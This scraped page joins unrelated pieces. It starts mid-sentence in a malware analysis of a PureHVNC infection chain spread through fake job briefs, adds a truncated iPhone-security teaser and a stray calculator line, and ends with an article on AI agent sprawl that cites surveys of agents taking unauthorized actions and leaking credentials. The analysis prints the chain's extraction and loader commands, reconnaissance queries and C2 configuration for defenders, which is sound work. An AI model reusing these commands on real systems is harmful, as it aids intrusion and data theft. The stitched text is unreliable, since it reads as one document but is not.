with the following command:</p><p><code>cmd.exe /c start "" "C:\Users\user\Desktop\Marketing Director Assessment Project\Marketing_Director_Assessment_Project.pdf"</code></p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="815" height="890" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_bbc624.png" alt="The PDF opened during the infection chain." class="wp-image-390231"><figcaption class="wp-element-caption">The PDF opened during the infection chain.</figcaption></figure><p>The archive <code>final.zip</code> is unzipped using different commands across the analyzed campaigns into a random folder under <code>ProgramData</code>. In this example, the <code>tar</code> command is used:</p><p><code>cmd.exe /c tar -xf "C:\ProgramData\{random folder}\{random folder \final.zip" -C "C:\ProgramData\{random folder \{random folder} " &gt;nul 2&gt;&amp;1</code></p><p>The zip contains several files associated with Python and the next stage.</p><figure class="wp-block-image aligncenter size-large"><img decoding="async" loading="lazy" height="385" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_2bfbd9.png?w=1024" alt="Python files compressed into a random folder in ProgramData." class="wp-image-390233"><figcaption class="wp-element-caption">Python files compressed into a random folder in ProgramData.</figcaption></figure><p>Next, an obfuscated Python script called <code>config.log</code> is executed. It ultimately decodes and runs a Donut shellcode. This script appears under different names (e.g., <code>image.mp3</code>) and formats in the different chains analyzed.</p><p><code>"C:\ProgramData\{random folder}\{random folder}\pythonw.exe" "C:\ProgramData\{random folder}\{random folder}\config.log"</code></p><figure class="wp-block-image aligncenter size-large"><img decoding="async" loading="lazy" height="447" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_12924c.png?w=1024" alt="Obfuscated Python script that ultimately loads the Donut shellcode." class="wp-image-390226"><figcaption class="wp-element-caption">Obfuscated Python script that ultimately loads the Donut shellcode.</figcaption></figure><p>At the end of the infection chain, PureHVNC was injected into <code>SearchUI.exe</code>. The injected process may vary across the analyzed samples.</p><p>PureHVNC executes the following WMI queries to gather information about the compromised device:</p><ul class="wp-block-list"> <li><code>SELECT * FROM AntiVirusProduct</code></li> <li><code>SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')</code></li> <li><code>SELECT Caption FROM Win32_OperatingSystem</code></li> </ul><p>For persistence, it creates a scheduled task using a base64-PowerShell command, with the flag <code>“-RunLevel Highest”</code> if the user has admin rights.</p><figure class="wp-block-image aligncenter size-large"><img decoding="async" loading="lazy" height="567" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/powershell-commnand-for-scheduled-task.png?w=1024" alt="" class="wp-image-390414"><figcaption class="wp-element-caption">PowerShell command for the Scheduled Task</figcaption></figure><p>PureHVNC performs enumeration to exfiltrate information related to various browsers, extensions, and cryptocurrency wallets.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="875" height="632" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_2a7963.png" alt="Methods related to wallet and browser data exfiltration." class="wp-image-390221"></figure><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="988" height="647" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_a587b6.png" alt="Methods related to wallet and browser data exfiltration." class="wp-image-390230"><figcaption class="wp-element-caption">Methods related to wallet and browser data exfiltration.</figcaption></figure><p>The malware configuration is encoded with base64 and compressed with GZIP.</p><p>In this case, the configuration includes:</p><ul class="wp-block-list"> <li><strong>C2</strong>: <code>207.148.66.14</code></li> <li><strong>C2 ports</strong>: <code>56001, 56002, 56003</code></li> <li><strong>Campaign ID</strong>: <code>Default</code> </li> <li><strong>Sleeping Flag</strong>: <code>0</code></li> <li><strong>Persistence Path</strong>: <code>APPDATA</code></li> <li><strong>Mutex Name</strong>: <code>Rluukgz</code> </li> </ul><h2 class="wp-block-heading" id="h-how-to-stay-safe">How to stay safe</h2><p>Using Google Forms is a highly effective method for distributing malware. Attackers are relying on trust in familiar tools like Google Forms, Dropbox, and LinkedIn, and impersonating legitimate companies to get past your guard.</p><p>If you deal with job offers, partnerships, or project work online, this is worth paying attention to:</p><ul class="wp-block-list"> <li>Always check the origin of Google Forms, don’t enter sensitive information, and don’t download files unless you fully trust the source.</li> <li>Verify requests through official company channels before engaging.</li> <li>Be wary of links hidden behind URL shorteners or redirects.</li> </ul><h2 class="wp-block-heading" id="h-indicators-of-compromise-iocs">Indicators of Compromise (IOCs)</h2><p><strong>IP</strong></p><p><code>207.148.66.14</code></p><p><strong>URL</strong></p><p><code>https://goo[.]su/CmLknt7</code></p><p><code>https://www.fshare[.]vn/file/F57BN4BZPC8W</code></p><p><code>https://tr[.].ee/R9y0SK</code></p><p><code>https://dl.dropbox[.]com/scl/fi/52sgtk50j285hmde2ycry/Overview-of-the-MSI-Accounting-Project.rar?rlkey=9qmunvcp8oleeycld08gqwup9</code></p><p><strong>HASH</strong></p><p><code>ca6bd16a6185c3823603b1ce751915eaa60fb9dcef91f764bef6410d729d60b3</code></p><p><code>d6b7ab6e5e46cab2d58eae6b15d06af476e011a0ce8fcb03ba12c0f32b0e6386</code></p><p><code>e7b9f608a90bf0c1e477a28f41cb6bd2484b997990018b72a87268bf46708320</code></p><p><code>e221bb31e3539381d4753633443c1595bd28821ab6c4a89ad00ea03b2e98aa00</code></p><p><code>7f9225a752da4df4ee4066d7937fe169ca9f28ecddffd76aa5151fb72a57d54b</code></p><p><code>e0ced0ea7b097d000cb23c0234dc41e864d1008052c4ddaeaea85f81b712d07c</code></p><p><code>b18e0d1b1e59f6e61f0dcab62fecebd8bcf4eb6481ff187083ea5fe5e0183f66</code></p><p><code>85c07d2935d6626fb96915da177a71d41f3d3a35f7c4b55e5737f64541618d37</code></p><p><code>b78514cfd0ba49d3181033d78cb7b7bc54b958f242a4ebcd0a5b39269bdc8357</code></p><p><code>fe398eb8dcf40673ba27b21290b4179d63d51749bc20a605ca01c68ee0eaebbc</code></p><p><code>1d533963b9148b2671f71d3bee44d8332e429aa9c99eb20063ab9af90901bd4d</code></p><p><code>c149158f18321badd71d63409d08c8f4d953d9cd4a832a6baca0f22a2d6a3877</code></p><p><code>83ce196489a2b2d18a8b17cd36818f7538128ed08ca230a92d6ee688cf143a6c</code></p><p><code>ea4fb511279c1e1fac1829ec2acff7fe194ce887917b9158c3a4ea213abd513a</code></p><p><code>59362a21e8266e91f535a2c94f3501c33f97dce0be52c64237eb91150eee33e3</code></p><p><code>a92f553c2d430e2f4114cfadc8e3a468e78bdadc7d8fc5112841c0fdb2009b2a</code></p><p><code>4957b08665ddbb6a2d7f81bf1d96d252c4d8c1963de228567d6d4c73858803a4</code></p><p><code>481360f518d076fc0acb671dc10e954e2c3ae7286278dfe0518da39770484e62</code></p><p><code>8d6bc4e1d0c469022947575cbdb2c5dd22d69f092e696f0693a84bc7df5ae5e0</code></p><p><code>258adaed24ac6a25000c9c1240bf6834482ef62c22b413614856b8973e11a79f</code></p><p><strong>Pro tip: </strong>This is only a partial list of malicious URLs. Download the <a href="https://www.malwarebytes.com/browserguard" rel="noreferrer noopener">Malwarebytes Browser Guard plugin</a> for full protection and to block the remaining malicious domains.</p><hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide"><p><strong>We don’t just report on threats—we remove them</strong></p><p>Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by <a href="https://www.malwarebytes.com/for-home">downloading Malwarebytes today</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/that-job-brief-on-google-forms-could-infect-your-device/" data-a2a-title="That “job brief” on Google Forms could infect your device"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthat-job-brief-on-google-forms-could-infect-your-device%2F&amp;linkname=That%20%E2%80%9Cjob%20brief%E2%80%9D%20on%20Google%20Forms%20could%20infect%20your%20device" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthat-job-brief-on-google-forms-could-infect-your-device%2F&amp;linkname=That%20%E2%80%9Cjob%20brief%E2%80%9D%20on%20Google%20Forms%20could%20infect%20your%20device" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthat-job-brief-on-google-forms-could-infect-your-device%2F&amp;linkname=That%20%E2%80%9Cjob%20brief%E2%80%9D%20on%20Google%20Forms%20could%20infect%20your%20device" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthat-job-brief-on-google-forms-could-infect-your-device%2F&amp;linkname=That%20%E2%80%9Cjob%20brief%E2%80%9D%20on%20Google%20Forms%20could%20infect%20your%20device" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthat-job-brief-on-google-forms-could-infect-your-device%2F&amp;linkname=That%20%E2%80%9Cjob%20brief%E2%80%9D%20on%20Google%20Forms%20could%20infect%20your%20device" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.malwarebytes.com/">Malwarebytes</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Malwarebytes">Malwarebytes</a>. Read the original post at: <a href="https://www.malwarebytes.com/blog/threat-intel/2026/03/that-job-brief-on-google-forms-could-infect-your-device">https://www.malwarebytes.com/blog/threat-intel/2026/03/that-job-brief-on-google-forms-could-infect-your-device</a> </p>

Ive been thinking a lot more about physical iPhone security recently. For a long time, weve encouraged biometric authentication over manually entering iPhone passcodes because of the very real threat… [+10107 chars]

EMI CalculatorDetermine the monthly installment amount for a loan

<p><span data-contrast="auto">By early 2026, the novelty phase of </span><a href="https://securityboulevard.com/2026/03/everyone-is-deploying-ai-agents-almost-nobody-knows-what-theyre-doing/"><span data-contrast="none">AI agents</span></a><span data-contrast="auto"> has officially ended. What began as excitement around automation has quietly evolved into a looming security risk across modern SaaS environments. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">This shift was evident at the World Economic Forum, where executives </span><a href="https://africa.businessinsider.com/news/execs-at-davos-say-ais-biggest-problem-isnt-hype-its-security/dx3slep"><span data-contrast="none">discussed the future of AI</span></a><span data-contrast="auto">. Notably, their concerns were no longer about hype or a potential bubble. Instead, the conversation focused on security. As Raj Sharma, EY’s global managing partner of growth and innovation, explained, organizations are not talking enough about the security implications of AI agents — particularly how they are managed throughout their lifecycle.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Security experts sounded these warning bells months earlier. They pointed out that AI capabilities are advancing faster than the security controls meant to govern them. Despite their growing capabilities, many agents remain poorly monitored, loosely governed, and overly trusted.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">The consequences are already visible. According to </span><a href="https://www.sailpoint.com/press-releases/sailpoint-ai-agent-adoption-report" target="_blank" rel="noopener"><span data-contrast="none">research from SailPoint</span></a><span data-contrast="auto">, eight in ten organizations report that their AI agents have taken unintended actions, such as accessing unauthorized systems, sharing inappropriate data, or downloading sensitive information. What’s even more concerning is that nearly a quarter of respondents say their agents have been manipulated into revealing access credentials.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Ofer Klein, CEO and cofounder of </span><a href="https://www.reco.ai/" target="_blank" rel="noopener"><span data-contrast="none">Reco</span></a><span data-contrast="auto">, explained that the reason AI agents introduce such significant security risks is that they can independently interact with identities, data, and systems — often leaving businesses with limited visibility into what those agents are actually doing.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Despite these risks, adoption continues to grow. The same SailPoint research reveals a striking paradox: while 96% of technology professionals see AI agents as a growing security risk, 98% of organizations still plan to expand their use to maintain a competitive advantage. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><h3 aria-level="2"><b><span data-contrast="auto">The AI Agent Visibility Gap and Sprawl</span></b><span data-ccp-props='{"134245417":false,"134245418":false,"134245529":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559739":120,"335559740":240}'> </span></h3><p><span data-contrast="auto">A growing visibility gap is emerging between what AI agents are actually running inside organizations and what security teams believe they own. That gap is said to be where the next wave of </span><a href="https://securityboulevard.com/2023/11/identifying-security-misconfiguration-in-enterprise-networks/" target="_blank" rel="noopener"><span data-contrast="none">enterprise security</span></a><span data-contrast="auto"> incidents is likely to originate. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">According to a </span><a href="https://www.ciodive.com/news/cios-regret-ai-vendor-platform-decisions/812147/" target="_blank" rel="noopener"><span data-contrast="none">survey of 600 CIOs</span></a><span data-contrast="auto">, out of 87% of companies that have AI agents embedded in critical systems, only 25% report having full visibility into all agents currently operating in production.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">This lack of oversight quickly shows up in the fundamentals of the agents’ security. Many organizations rely on authentication methods designed for a different era of non-human identities. For instance, some use static API keys, some rely on username-and-password combinations, while others depend on shared service accounts. These persistent credentials create long-lived access pathways — precisely the kind of access model that becomes risky when autonomous systems operate continuously across multiple platforms.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">This visibility problem runs deeper than authentication. Nearly </span><a href="https://www.strata.io/resources/whitepapers/securing-autonomous-ai-agents-csa-survey-report-2026-strata-identity/" target="_blank" rel="noopener"><span data-contrast="none">80% of organizations</span></a><span data-contrast="auto"> deploying autonomous AI cannot confidently say what their agents are doing or who is responsible for them.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">This lack of visibility is exactly what allows AI agent sprawl to emerge.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Without this basic visibility, organizations cannot answer fundamental governance questions like:</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="1" data-aria-level="1"><span data-contrast="auto">We Which agents exist</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="2" data-aria-level="1"><span data-contrast="auto">Where they run</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="3" data-aria-level="1"><span data-contrast="auto">What systems they access; and</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="4" data-aria-level="1"><span data-contrast="auto">Who approved them</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></li></ul><p><span data-contrast="auto">Much like API sprawl or the </span><a href="https://securityboulevard.com/2026/03/saas-sprawl-has-become-the-new-shadow-it-why-traditional-security-struggles-to-see-and-stop-it/" target="_blank" rel="noopener"><span data-contrast="none">shadow IT</span></a><span data-contrast="auto"> era, this pattern starts with small, independent deployments. Marketing teams build agents for content generation, sales deploy agents for lead scoring, and finance automates invoice processing. Each solution works in isolation. Yet over time, agents multiply without centralized oversight.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Unlike shadow IT, however, AI agent sprawl evolves faster and is harder to detect. With low-code and no-code tools making it easy for any department to create agents, organizations often discover too late that dozens — or even hundreds — of autonomous systems are already operating across their SaaS environments.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><h3 aria-level="2"><b><span data-contrast="auto">Why Not Use Traditional SaaS Security Tools?</span></b><span data-ccp-props='{"134245417":false,"134245418":false,"134245529":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559739":120,"335559740":240}'> </span></h3><p><span data-contrast="auto">Well, traditional </span><a href="https://securityboulevard.com/2023/11/top-10-saas-security-tools/" target="_blank" rel="noopener"><span data-contrast="none">SaaS security tools</span></a><span data-contrast="auto"> were designed for environments where humans interact directly with applications. However, the introduction of autonomous AI agents disrupts this model. AI agents often operate with permissions far broader than those granted to individual users, allowing them to span multiple systems and workflows. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">As a result, when users interact with these agents, they no longer access systems directly. Instead, they submit requests that the agent executes on their behalf, and those actions run under the agent’s identity rather than the user’s.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">This shift breaks the fundamentals of traditional access control and models, which brings significant agent security implications.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><a href="https://securityboulevard.com/2025/10/what-is-identity-and-access-management-iam/" target="_blank" rel="noopener"><span data-contrast="none">Identity Access Management (IAM)</span></a><span data-contrast="auto">, for example, usually uses the user’s identity to decide what they can do. But when an AI agent acts, authorization is evaluated against the agent’s privileges, not the requester’s. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Consequently, a user with limited permissions can indirectly trigger actions or retrieve data they would not normally be allowed to access. Because logs and audit trails record the agent as the actor, these activities can occur without clear attribution or policy enforcement.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><h3 aria-level="2"><b><span data-contrast="auto">Human-In-The-Loop Alone is Not Enough</span></b><span data-ccp-props='{"134245417":false,"134245418":false,"134245529":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559739":120,"335559740":240}'> </span></h3><p><span data-contrast="auto">Many organizations are turning to human-in-the-loop (HITL) to mitigate these risks. This typically requires human validation before agents can access sensitive data, make system changes, approve financial transactions, or grant permissions. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">While rational, this approach is more a symptom than a full strategy: it compensates for weak visibility rather than addressing the underlying governance gap.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">HITL introduces a bottleneck that slows adoption and cannot scale across hundreds of autonomous agents. It also lacks mechanisms for out-of-band liveness checks or consent approvals, leaving organizations exposed to unchecked agent activity.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><h3 aria-level="2"><b><span data-contrast="auto">Efficient AI Agent Sprawl Solutions</span></b><span data-ccp-props='{"134245417":false,"134245418":true,"134245529":true,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559739":240,"335559740":240}'> </span></h3><p><span data-contrast="auto">To effectively manage AI agent sprawl, organizations need a structured approach that combines visibility, access control, and risk management. The following solutions outline how to discover, govern, and secure AI agents as they scale across modern SaaS environments.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559739":240,"335559740":240}'> </span></p><ol><li aria-level="3"><b><span data-contrast="none"> Comprehensive AI Agent Inventory</span></b></li></ol><p><span data-contrast="auto">The first step toward controlling AI agent sprawl is achieving complete visibility. Organizations need a single pane of glass that provides a unified view of every agent operating across their environment. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Whether agents are built on platforms like Amazon Bedrock, Google Vertex AI, or Azure AI and use frameworks such as LangChain, CrewAI, or AutoGen, they should all be catalogued in a centralized agent catalog. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">This catalog acts as an authoritative inventory that continuously discovers and tracks agents across environments. It should identify who owns each agent, where it runs, what systems it connects to, and how it authenticates.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><ol start="2"><li aria-level="3"><b><span data-contrast="none"> Access and Permission Mapping</span></b></li></ol><p><span data-contrast="auto">AI agents should begin with limited privileges. This is because agents interact with tools, APIs, and internal data sources through automated workflows; therefore, clear boundaries are essential to prevent unintended actions or data exposure. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Every agent should also receive its own unique identity with permissions scoped to its specific function rather than inheriting access from the deploying user. From there, organizations can apply structured controls such as scoped permissions tied to particular business systems, time-bound credentials that automatically expire, and least-privilege policies that restrict unnecessary access.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><ol start="3"><li aria-level="3"><b><span data-contrast="none"> Risk Identification, Prioritization &amp; Response</span></b></li></ol><p><span data-contrast="auto">Next, organizations should classify agents into risk tiers based on the sensitivity of the data they access and the potential impact of their decisions. Remediation should then be prioritized using automated risk scoring. This scoring combines dynamic access analysis to detect overprivileged or inactive agents, anomalies, or weak authentication, and breach-likelihood analysis of vendors connected to these agents.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559739":240,"335559740":240}'> </span></p><p><span data-contrast="auto">Reco is one example of a platform addressing this challenge. It inventories all AI agents in an environment and maps their access, permissions, connections, and overall risk posture. This visibility allows security teams to decide which agents should be sanctioned, restricted, or blocked before they introduce risk. The platform also provides guided remediation workflows that help organizations respond quickly to security issues. For example, teams can revoke excessive permissions, disable unauthorized agents, or trigger automated responses through existing security workflows and ticketing systems.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><h3 aria-level="2"><b><span data-contrast="auto">Embed Governance &amp; Visibility Early to Move Faster With AI Agents</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":360,"335559739":120}'> </span></h3><p><span data-contrast="auto">As AI-driven automation scales to thousands of SaaS applications, enterprises face a growing security blind spot. The solution isn’t slowing adoption; it’s embedding governance and observability from the start. By centralizing agent management on a platform like Reco Security, with full visibility and controls, organizations can deploy agents confidently, accelerate innovation, and scale.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559739":240,"335559740":240}'> </span></p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/tackling-the-uncontrolled-growth-of-ai-agents-in-modern-saas-environments/" data-a2a-title="Tackling the Uncontrolled Growth of AI Agents in Modern SaaS Environments "><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ftackling-the-uncontrolled-growth-of-ai-agents-in-modern-saas-environments%2F&amp;linkname=Tackling%20the%20Uncontrolled%20Growth%20of%20AI%20Agents%20in%20Modern%20SaaS%20Environments%C2%A0" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ftackling-the-uncontrolled-growth-of-ai-agents-in-modern-saas-environments%2F&amp;linkname=Tackling%20the%20Uncontrolled%20Growth%20of%20AI%20Agents%20in%20Modern%20SaaS%20Environments%C2%A0" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ftackling-the-uncontrolled-growth-of-ai-agents-in-modern-saas-environments%2F&amp;linkname=Tackling%20the%20Uncontrolled%20Growth%20of%20AI%20Agents%20in%20Modern%20SaaS%20Environments%C2%A0" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ftackling-the-uncontrolled-growth-of-ai-agents-in-modern-saas-environments%2F&amp;linkname=Tackling%20the%20Uncontrolled%20Growth%20of%20AI%20Agents%20in%20Modern%20SaaS%20Environments%C2%A0" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ftackling-the-uncontrolled-growth-of-ai-agents-in-modern-saas-environments%2F&amp;linkname=Tackling%20the%20Uncontrolled%20Growth%20of%20AI%20Agents%20in%20Modern%20SaaS%20Environments%C2%A0" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>